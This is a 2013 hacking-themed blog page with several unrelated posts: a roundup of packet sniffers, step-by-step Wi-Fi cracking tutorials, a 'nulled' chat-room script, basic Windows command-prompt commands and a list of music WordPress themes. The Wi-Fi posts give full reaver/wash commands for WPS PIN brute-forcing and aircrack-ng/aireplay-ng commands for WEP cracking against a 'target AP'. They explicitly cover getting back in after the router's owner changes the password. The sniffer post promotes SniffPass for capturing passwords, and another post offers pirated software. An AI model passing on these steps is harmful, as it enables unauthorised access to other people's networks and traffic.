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Tuesday, February 26, 2013

5 Best Free Network Packet Sniffer

Here are 5 Best free network packet sniffers that does a fantastic job of packet sniffing. These free packet sniffer can analyze network packets of all outgoing traffic, and analyze information from them.
Before we go further, here is a definition of a Packet Sniffer from Wikipedia:
A packet analyzer (also known as a network analyzer, protocol analyzer or sniffer, or for particular types of networks, an Ethernet sniffer or wireless sniffer) is a computer program or a piece of computer hardware that can intercept and log traffic passing over a digital network or part of a network. As data streams flow across the network, the sniffer captures each packet and, if needed, decodes and analyzes its content according to the appropriate RFC or other specifications.
As mentioned in definition above, a packet sniffer is also able to sometimes decode and analyze network traffic to extract useful information. Such information could be passwords, or other credentials passed over network.

WireShark Packet Sniffer

Wireshark is a free and open-source packet sniffer. This free network packet sniffer is one of the most popular packet sniffing freeware in the world. It is a cross-platform packet sniffer, and works on both Unix, as well as Windows.
One of the great feature of Wireshark packet sniffer is that it comes with a GUI that makes it extremely easy to use and setup. Apart from that, Wireshark website provides tons of resources, including videos, to learn how to use Wireshark, and analyze Wireshark data.
Wireshark packet sniffer is able to capture live real-time network packets. Apart from that, it is able to intelligently decipher packets based on their protocol. It can show the capture data on GUI. It is even able to detect and capture VOIP calls, and in some cases can even play back the media.
Wireshark is under active development, and is actively supported by a huge community of users and developers. This ensures that Wireshark is always kept up to date, and keeps coming out with new features.
Read more about Wireshark, or download free here.

Capsa Packet Sniffer Free

Capsa is a very comprehensive network packet sniffer that comes in both free version as well as paid version. Free version comes with tons of features, and is good enough for home use, as well as use in small business. Capsa  does effective network analysis in real time by sniffing network packets, and analyze them. Free version of Capsa lets you monitor 50 IP addresses together, which makes this free packet sniffer especially useful for network administrators.
Capsa Packet Sniffer
Capsa packet sniffer has been especially optimized for use in an enterprise. Some of the features include:
  • Detailed Traffic Monitor of all computers
  • Bandwidth monitoring (to find which computers are watching online videos)
  • Network diagnosis to identify problems in network
  • Netwok activity logging (for recording IM, and web mail)
  • Network behavior monitoring
Download Capsa Packet Sniffer free here.

SniffPass Password Sniffer

SniffPass is a very specific type of packet sniffer that focuses on capturing passwords from network traffic. When you turn on Sniffpass password sniffer, it keeps on monitoring network traffic, and as soon as it intercepts a password, it instantly shows that on screen. This is a great way to find forgotten passwords of websites.
Sniffpass password sniffer is quite easy in its use, and provides a nice GUI to monitor all captured passwords. Sniffpass password sniffer supports most of the networks protocols, like: POP3, IMAP4, SMTP, FTP, and HTTP.
Read more about Sniffpass password sniffer, or download free here.

Microsoft Network Monitor

Microsoft Network Monitor is a free network packet sniffer. This works on Windows PCs, and provides expert capability to see all the network traffic in real time on an intuitive GUI. Microsoft Network Monitor  is actively maintained by Microsoft, is available for a completely free download, and has a dedicated support site here. Microsoft Network Monitor can be used by beginners just to analyze their home network traffic, or by network administrators to analyze complete organization network by sniffing network packets.
This freeware packet sniffer supports more than 300 public, and Microsoft proprietary protocols. It even lets you capture wireless network packets.
Download Microsoft Network Monitor free here.


tcpdump is one of the oldest network packet sniffer. It was originally written in 1987! Tcpdump works primarily on Unix like operating systems, but there is a port of it that works on Windows as well. tcpdump  is meant for experienced users only, as this packet sniffer is a command line utility. tcpdump can analyze network behavior, and monitor applications that generate network traffic.
Download tcpdump  free here.
Another network monitor we covered earlier is iTrafficMonitor. If you want to analyze network packets of a particular web page, you can check out Fiddler. Also check out free offline browser.

Saturday, February 16, 2013

wifi password crack using backtrack with reaver & wash ( 100% work )

WPA2-PSK Cracking


What is reaver?

Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

How do i use this tool?

As said above, just follow this tutorial :)

NOTE: Reaver doesn't need any Dictionary files!

First, type:


As said earlier, this shows you, your wireless card name.

I'll use wlan0

We need to set it the wireless card on monitor mode, so type:
Quote:airmon-ng start wlan0

After that, type:
Quote:airodump-ng mon0

Spoiler (Click to Hide)
[Image: xIHlA.png]

Now, copy the BSSID of the target AP.
Press CONTROL+c to cancel

To see the AP's that are vulnerable to WPS attacks, type:

Quote:wash -i mon0

If the target AP is vulnerable, it should say:

Quote:WPS Locked: No

Spoiler (Click to Hide)
[Image: QK6DD.png]

Now, to start the attack, type:

Quote:reaver -i mon0 -b [BSSID] -vv
Spoiler (Click to Hide)
[Image: VhpkO.png]

Now, you'll need to wait around 2-10 hours.

If the AP is limiting you with a message saying:

Quote:[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying


If reaver says that it is trying the same pin, over and over, press CONTROL+c to cancel, then type:

Quote:reaver --help

This will show you the help menu, you can start playing with the options that you have.

I usually add the: -c -S -L

Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv

This one works great for me, so keep playing with the options untill it works!

When it reaches 100% it should give you some lines, the password is the one after:

And here it is!

You should also, remember the PIN.

Now, let's say for some reason, the router's owner changed the password for his WiFi.

Since you already have the pin, type:
Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv

And it should give you the password in a matter of seconds!

WEP Cracking using backtrack

WEP Cracking

What is Aircrack-NG?

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.

How do i use this tool?

Simple, just follow my tutorial and you'll be able to crack ALMOST any WEP encrypted password.

These are active attacks, which means that you have to be near the target router in order for this to work. About 50% of signal should be good.

Let's Begin.

Open up a terminal and type:


Spoiler (Click to Hide)
[Image: IQDaS.png]

This will show you, your wireless card name. In my case it is called wlan1, but i also have wlan0.

Now, we need to set the wireless card in monitor mode, to do that type:
Quote:airmon-ng start wlan1

Ok, your wireless card is now on monitor mode. If you type airmon-ng again, it'll show you mon0

After that, type:
Quote:airodump-ng mon0

Spoiler (Click to Hide)
[Image: SLbK9.png]

When you press enter, it should show you all the Access Points near you.
Copy the BSSID and remember the Channel Number of the target AP.

Press CONTROL+c to cancel. Do this only when you found and copied the info about the target AP.

Spoiler (Click to Hide)
[Image: PbF3r.png]

Now, type:
Quote:airodump-ng -c [channel number] --bssid [bssid] -w wep mon0

Spoiler (Click to Hide)
[Image: WaRxV.png]

You should know start recieving DATA.
Spoiler (Click to Hide)
[Image: oJp5G.png]

To speed up this proccess, open up another terminal and type:
Quote:aireplay-ng -1 0 -a [BSSID] mon0

After it says it was successfull, type:
Quote:aireplay-ng -3 -b [BSSID] mon0

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[Image: n9Eni.png]

After a some seconds, this should appear:
Spoiler (Click to Hide)
[Image: yVOlw.png]

When you reach 20000 of DATA, which will be really quick if you did what i said above, open another terminal and type:
Quote:aircrack-ng wep-01.cap

Now, wait for some minutes and it should give you the PASSWORD! Yeye

The password is:

Spoiler (Click to Hide)
[Image: xKs6P.png]

Tuesday, February 12, 2013

Pro Chat Rooms v7.0 Nulled Audio/Video Chat Rooms

Pro Chat Rooms v7.0 Nulled Audio/Video Chat Rooms

Pro Chat Rooms v7.0 Nulled Audio/Video Chat Rooms

Multi-user chat room software written in PHP/MySQL/AJAX. Features unlimited chat rooms, customisable text, private chat, avatars, smilies, sounds, user profiles, multi-level chat room management (administrators & moderators), chat message history, IRC type commands, a wide range of optional plugins and much more.

The Pro Chat Rooms software currently integrates with over 30 content management systems (CMS) including custom built management systems and databases. This allows your members to auto-login to the chat rooms without entering their login details twice and includes linking to members existing profiles.

Sunday, February 10, 2013

CMD (Command Prompt)

Today i am going to talk about some basic command of CMD.

CMD is shell of microsoft windows. In simple words, windows are the GUI(Graphic user interface) of CMD. If some one want to become computer expert or Hacker then he should have full command on CMD.
1- Press "Start" button
2- Open "Run"
3- Write "cmd" and Press Enter
 That,s its view and we also call it terminal.

Now i will start from some basic commands.
*Note: Do not include " "(inverted comma) in cmd.
- Write "  dir    " this will show all directories(folders and files) in current file.

- Write " cd     " this will change your directory or folder. i.e "  cd c:  " Press Enter
- Write " cd..   " this is used is back in CMD.
- Write " ipconfig " this will show your IP and MAC information.
- Write " Ping(space)website_name " this will ping that website i.e " ping "

- Write "  exit  " this will exit or close the CMD terminal.

35 Music WordPress Themes

Here is a beautiful collection of 35 Music WordPress Themes for free. I have gathered almost 35 Music WordPress themes for my readers to freely download and use on their music blogs. As I often share good quality free content with my readers, this collection of 35 Music WordPress themes is also completely free to download and use. Every theme will contain a link to its live demo and a link for downloading. I have also inserted short screenshots for you to judge quickly which theme you want to see in demo or to download. Now, let me share collection of 35 MusicWordPress themes with you.

35 Music WordPress Themes

Music WordPress Theme No. 1 – HipHop

Demo - Download ]
HipHop Music WordPress Themes
HipHop Music WordPress Themes

Music WordPress Theme No. 2 – MusicSpace

Demo - Download ]
MusicSpace Music WordPress Theme
MusicSpace Music WordPress Theme

Music WordPress Theme No. 3 – SoundWaves

Demo - Download ]
SoundWaves Music WordPress Theme
SoundWaves Music WordPress Theme

Music WordPress Theme No. 4 – MusicPress

Demo - Download ]
MusicPress Music WordPress Theme
MusicPress Music WordPress Theme

Music WordPress Theme No. 5 – MusicConcert

Demo - Download ]
MusicConcert Music WordPress Theme
MusicConcert Music WordPress Theme

Music WordPress Theme No. 6 – MusicStar

Demo - Download ]
MusicStar Music WordPress Theme
MusicStar Music WordPress Theme

Music WordPress Theme No. 7 – MusicNation

Demo - Download ]
MusicNation Music WordPress Theme
MusicNation Music WordPress Theme

Music WordPress Theme No. 8 – MusicLife

Demo - Download ]
MusicLife Music WordPress Theme
MusicLife Music WordPress Theme

Music WordPress Theme No. 9 – MusicSense

Demo - Download ]
MusicSense Music WordPress Theme
MusicSense Music WordPress Theme

Music WordPress Theme No. 10 – MusicStyle

Demo - Download ]
MusicStyle Music WordPress Theme
MusicStyle Music WordPress Theme

Music WordPress Theme No. 11 – MusicStore

Demo - Download ]
MusicStore Music WordPress Theme
MusicStore Music WordPress Theme

 Music WordPress Theme No. 12 – iMusic

Demo - Download ]
iMusic Music WordPress Theme
iMusic Music WordPress Theme

Music WordPress Theme No. 13 – MusicGate

Demo - Download ]
MusicGate Music WordPress Theme
MusicGate Music WordPress Theme

Music WordPress Theme No. 14 – MusicGlobe

Demo - Download ]
MusicGlobe Music WordPress Theme
MusicGlobe Music WordPress Theme

Music WordPress Theme No. 15 – MusicStyle

Demo - Download ]
MusicStyle2 Music WordPress Theme
MusicStyle2 Music WordPress Theme

Music WordPress Theme No. 16 – BlueMusic

Demo - Download ]
BlueMusic Music WordPress Theme
BlueMusic Music WordPress Theme

Music WordPress Theme No. 17 – MagicStyle

Demo - Download ]
MagicStyle Music WordPress Theme
MagicStyle Music WordPress Theme

Music WordPress Theme No. 18 – CityMusic

Demo - Download ]
CityMusic Music WordPress Theme
CityMusic Music WordPress Theme

Music WordPress Theme No. 19 – MusicalBlog

Demo - Download ]
MusicalBlog Music WordPress Theme
MusicalBlog Music WordPress Theme

Music WordPress Theme No. 20 – VirtineBlog

Demo - Download ]
VirtineBlog Music WordPress Theme
VirtineBlog Music WordPress Theme

Music WordPress Theme No. 21 – MosaicMusic

Demo - Download ]
MosaicMusic Music WordPress Theme
MosaicMusic Music WordPress Theme

Music WordPress Theme No. 22 – LiveMusic

Demo - Download ]
LiveMusic Music WordPress Theme
LiveMusic Music WordPress Theme

Music WordPress Theme No. 23 – PartyNote

Demo - Download ]
PartyNote Music WordPress Theme
PartyNote Music WordPress Theme

Music WordPress Theme No. 24 – BeautyMusic

Demo - Download ]
BeautyMusic Music WordPress Theme
BeautyMusic Music WordPress Theme

Music WordPress Theme No. 25 – iTunes

Demo - Download ]
iTunes Music WordPress Theme
iTunes Music WordPress Theme

Music WordPress Theme No. 26 – MusicStock

Demo - Download ]
MusicStock Music WordPress Theme
MusicStock Music WordPress Theme

Music WordPress Theme No. 27 – ColorMusic

Demo - Download ]
ColorMusic Music WordPress Theme
ColorMusic Music WordPress Theme

Music WordPress Theme No. 28 – JukeBox

Demo - Download ]
JukeBox Music WordPress Theme
JukeBox Music WordPress Theme

Music WordPress Theme No. 29 – MovieTheater

Demo - Download ]
MovieTheater Music WordPress Theme
MovieTheater Music WordPress Theme

Music WordPress Theme No. 30 – MovieReview

Demo - Download ]
MovieReview Music WordPress Theme
MovieReview Music WordPress Theme

Music WordPress Theme No. 31 – MyMovie

Demo - Download ]
MyMovie Music WordPress Theme
MyMovie Music WordPress Theme

Music WordPress Theme No. 32 – MusicPlus

Demo - Download ]
MusicPlus Music WordPress Theme
MusicPlus Music WordPress Theme

Music WordPress Theme No. 33 – RadioRock

Demo - Download ]
RadioRock Music WordPress Theme
RadioRock Music WordPress Theme

Music WordPress Theme 34 – MusicWorld

Demo - Download ]
MusicWorld Music WordPress Theme
MusicWorld Music WordPress Theme

Music WordPress Theme No. 35 – Moonlight Tunes

Demo - Download ]
Moonlight Tunes Music WordPress Theme
Moonlight Tunes Music WordPress Theme
So guys, these were 35 Music WordPress Themes. I have collected them from different websites and developers and posted all of the best from them here on my blog. You can choose and download any theme freely. Have a nice day!